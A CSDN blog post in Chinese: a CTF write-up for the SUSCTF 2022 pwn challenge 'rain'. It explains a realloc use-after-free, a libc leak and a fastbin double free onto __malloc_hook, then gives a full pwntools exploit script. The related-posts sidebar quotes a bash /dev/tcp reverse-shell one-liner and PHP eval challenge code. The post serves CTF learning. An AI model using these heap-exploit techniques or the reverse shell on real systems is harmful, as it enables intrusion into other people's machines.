SUSCTF 2022 rain

最新推荐文章于 2022-09-14 17:56:45 发布
最新推荐文章于 2022-09-14 17:56:45 发布
阅读量542 收藏 2
点赞数
分类专栏: PWN 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/123175280
版权

首先理解程序的结构,三个功能,一个编辑config,一个打印config,一个rain,其中config用的是realloc来申请,realloc中的size参数,是你写入的config的大小-18

realloc存在UAF,当size为0,即输入的config大小恰为18的时候,realloc(ptr,0)的效果等同于free(0),所以只需要先利用realloc申请一个不在fastbin里的东西,然后free 8 次,再申请回来一次,就可以泄露libc

接下来利用realloc导致的double free,将malloc_hook-0x23写到fastbin链表里,注意这里为什么不用tcache打free_hook,因为tcache里的指针始终和realloc时的ptr相同,导致realloc不从tcache里申请。

最后申请到malloc_hook-0x23后,把onegadget写到realloc_hook上就可以了

exp:

from re import L
from pwn import *
from ctypes import *
from string import *
from hashlib import *
from itertools import product
context.log_level = 'debug'
context.arch='amd64'
io = process('./pwn',aslr=True)
#io = remote('124.71.185.75',9999)
libc = ELF('./libc-2.27.so')
elf=ELF("./pwn")
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def menu(choice):
    sla("ch> ",str(choice))
def config(frame):
    menu(1)
    sa("FRAME> ",frame)
def show():
    menu(2)
def rain():
    menu(3)
#height+width+color+color+rainfall
init_config=p32(0x50)*2+p8(2)+p8(1)+p32(0x64)*2
payload=init_config+'a'*0x80
atoi_got=elf.got['atoi']
config(payload)
for i in range(8):
    config(init_config)
show()
ru('Table:')
libcbase=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-(0x7fe5c890eca0-0x7fe5c8523000)
main_arena=libcbase+(0x7fe5c890eca0-0x7fe5c8523000)
system=libcbase+libc.sym['system']
atoi=libcbase+libc.sym['atoi']
free_hook=libcbase+libc.sym['__free_hook']
malloc_hook=libcbase+libc.sym['__malloc_hook']
lg("libcbase")
lg("system")
payload=init_config+p64(main_arena)*2
config(payload)
payload=init_config+'a'*0x60
config(payload)
for i in range(7):
    config(init_config)
init_config=p32(1)+p32(0x60)+p8(2)+p8(1)+p32(0x64)*2
payload=init_config+p64(malloc_hook-0x23)*12
config(payload)

init_config=p32(0x50)*2+p8(2)+p8(1)+p32(0x64)*2


payload=init_config+'a'*0x90
config(payload)
config(init_config)
payload=init_config+'a'*0x10
config(payload)
payload=init_config+'a'*0x60
config(payload)
gdb.attach(io)
init_config=p32(1)+p32(0x60)+p8(2)+p8(1)+p32(0x64)*2
payload=init_config+'a'*0x60
config(payload)

init_config=p32(0)*2+p8(2)+p8(1)+p32(0x64)*2
payload=init_config+'a'*0xc0
config(payload)
config(init_config)

payload=init_config+'a'*0x10
config(payload)
#0x4f365
#0x4f3c2
#0x10a45c
onegadget=libcbase+0x10a45c
payload='\x00'*(0x13-8)+p64(onegadget)
lg('onegadget')
payload=init_config+payload.ljust(0x60,'\x00')
config(payload)
config(payload)

irt()
Ayakaaaa
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SCUCTF2020部分writeup
博客
06-21 1089
SCUCTF2020部分writeup MISC 专 业 团 队 binwalk -e Daning.png 提取出word文档 scuctf{19cc63ff-50b9-4254-a997-89d613290918} 记录 flag{b80e3ba4-055f-4c26-9482-23dc46424852} APU的犯罪证据 上传的shell <?php session_start(); function fastpow($a,$b,$c) { if($b==0) ret
2022SCUCTF
unexpectedthing的博客
05-22 625
前言 这次出了两个题,但是只放了一个easy_web这个题。镜像我都上传到我的dockerhub里了,自己需要的可以拉取。z3eyond的dockerhub easy_web F12,想到了robots.txt,下载源码 下载后开始审计代码,这儿我就不把源码复制过来了。 根据源码的User.class.php,直接admin,password登录进去 构造pop链 看到php文件中有很多魔法函数,就需要构造一个pop链子 链子从头到尾找,头部在User类的__desctruct中,然后尾部是在Files类
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1862
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
2020 SCUCTF 新生赛 crypto RSA wp
cosmoslin的博客
11-28 607
2020 SCUCTF 新生赛 crypto RSA wp 简介 第一次写博客,记录自己第一次CTF比赛,内容为2020年scuctf新生赛的crypto部分。 RSA加密算法 由来 RSA是1977年由罗纳德·李维斯特(Ron Rivest)、阿迪·萨莫尔(Adi Shamir)和伦纳德·阿德曼(Leonard Adleman)一起提出的。当时他们三人都在麻省理工学院工作。RSA就是他们三人姓氏开头字母拼在一起组成的 。 算法原理 RSA公开密钥密码体制的原理是:根据数论,寻求两个大素数比较简单,而将它们
SCUCTF部分wp(2)
weixin_44057967的博客
04-10 151
#写一道做了一早上的MISC: 1.下载下来直接wireshark 2.找http请求 3.发现有三个文件上传的http请求 4.导出 5.打开后分别是key 加密算法 和 加密后密文 6.写个py直接解密 ##走的一些弯路: 1.下载后有一个webkit+一串hex,一开始以为跟解题有关系,后来发现其实就是一个**标识符?**没什么卵用 2.打开加密算法发现加密好复杂…实在不会解…搜了搜类似的...
下雨rain.rar
04-05
下雨rain.rar 下雨rain.rar 下雨rain.rar 下雨rain.rar 下雨rain.rar 下雨rain.rar
The Matrix Rain.java
08-04
java代码,黑客帝国代码雨源码,main方法最后要创建Rain对象即可。
qaoqei.zip_rain attenuation
07-15
保证准确无误,是学习通信的好帮手,汽车课设货车Matlab驱动力图程序,考虑雨衰 阴影 和多径影响。
rain removal.rar_rain removal_removal
07-13
rain removal using L0 gradient
SCUCTF
皮三宝好菜的博客
12-25 663
SCUCTF RE re1 拖进ida里一看就出来了 但是提交的时候答案是SCUCTF{}。。。。。。 没搞懂为啥,害得我调试了半天 re2 程序加壳了直接脱了后看伪代码 //第一次写的时候没脱壳。。。因为加密算法比较简答,就是和0x27逐个异或么。。。 上py a = [0x74, 0x5E, 0x5C, 0x75, 0x42, 0x51, 0x14, 0x55, 0x54, 0x42, ...
[SCUCTF2022]校赛Web出题笔记
cosmoslin的博客
05-27 1924
前言 本次校赛我出了两个题,一个签到一个中等,由于自己的原因导致这两道题都出现了比较离谱的非预期,这里给师傅们谢罪了。 checkin <?php error_reporting(0); $action = $_GET['a']?$_GET['a']:highlight_file(__FILE__); if($action==='inject'){ die('Permission denied'); } $lock = call_user_func(($_GET['Y'])); if (
SUSCTF 2022 Crypto复现
M3ng@L的博客
09-14 1124
AnalysisAnalysisAnalysis 简答来说,题目中函数生成了一个实数矩阵A\pmb{A}AA,并且大小为;由以单个字符构成的大小的矩阵X\pmb{X}XX;由矩阵乘法B=AX\pmb{B}=\pmb{A}\pmb{X}BB=AAXX,生成结果矩阵b\pmb{b}bb;已知量有实数矩阵A\pmb{A}AA,以及结果矩阵B\pmb{B}BB我们已知矩阵乘法中的一个乘数矩阵以及结果矩阵,那么可以计算X=AB\pmb{X}=\pmb{A} \pmb{B}XX=AABB,得到矩阵X\pmb{X}XX;
SUSCTF2022 tttree
sky123博客
03-12 2614
首先将 0x140010074 ,0x140017EFA ,140018C67 起始处的数据转换为汇编。 观察汇编,发现很多代码块之间相互跳转,因此先按照 retn 划分代码块。 代码块中存在大量类似 push rcx;pop rcx 的无用操作,将其去除后继续分析。 def simplify_asms(asms): left_asms = [] for asm in asms: if asm.startswith("pop") and len(left_asms)
SUSCTF
weixin_44319142的博客
04-14 441
Crypto 哈夫曼树构造 根据flag格式试着去构造 11 000111 11 00010 000110 100 00001 01 11 101 01 11 101 0010 0010 101 11 01 101 01 11 0011 100 0011 0011 11 11 01 11 101 01 11 11 101 100 101 11 100 11 101 0010 01 11 01 1...
CTF新生赛之Writeup
shikaku_的博客
11-27 3990
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要写这个,我就写了签到题哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道题,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
2018 SCUCTF web题:cat?非常规题解
博客
12-19 1833
主要思路 1.寻找可以写入的目录 2.通过 &gt; 构造文件名,在通过 ls -th&gt;g 将命令写入文件 3.通过bash -i &gt;&amp; /dev/tcp/你的公网ip/监听的端口 0&gt;&amp;1构造反弹shell 4.在服务器使用 "nc -lnvp 相应端口" python脚本如下 # -*- coding: utf8 -*- import requests im...
SCUCTF部分wp
weixin_44057967的博客
04-10 476
之前没有接触过Crypto的题,现在在学校的平台上练习,也是给自己的一个记录: Crypto1: JTVDdTAwMjYlNUN1MDAyMyU1Q3UwMDMxJTVDdTAwMzElNUN1MDAzNSU1Q3UwMDNiJTVDdTAwMjYlNUN1MDAyMyU1Q3UwMDM5JTVDdTAwMzklNUN1MDAzYiU1Q3UwMDI2JTVDdTAwMjMlNUN1MDAzMSU...
2019SCUCTF部分题解
博客
05-20 1149
writeup2019SCUCTF部分题解赛前通知解题思路flagweb来了老弟解题思路flag你好呀解题思路参考链接:flag简单的XSS解题思路参考链接flag稍难一点的XSS解题思路参考链接flagreshowme666解题思路参考链接flagpwnbabystack解题思路flaglogin解题思路flagMISC流量分析解题思路参考链接flagstream解题思路flag婉姐姐的内存镜像...
rain::rain r包
最新发布
02-02
在游戏中,玩家需要根据音乐节奏在屏幕上出现的指示符来进行操作,而“rain r包”就是其中的一种操作元素。玩家需要按照指示符的要求使用手指或其他输入设备点击或触摸“rain r包”,从而完成游戏中的音乐节奏操作。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值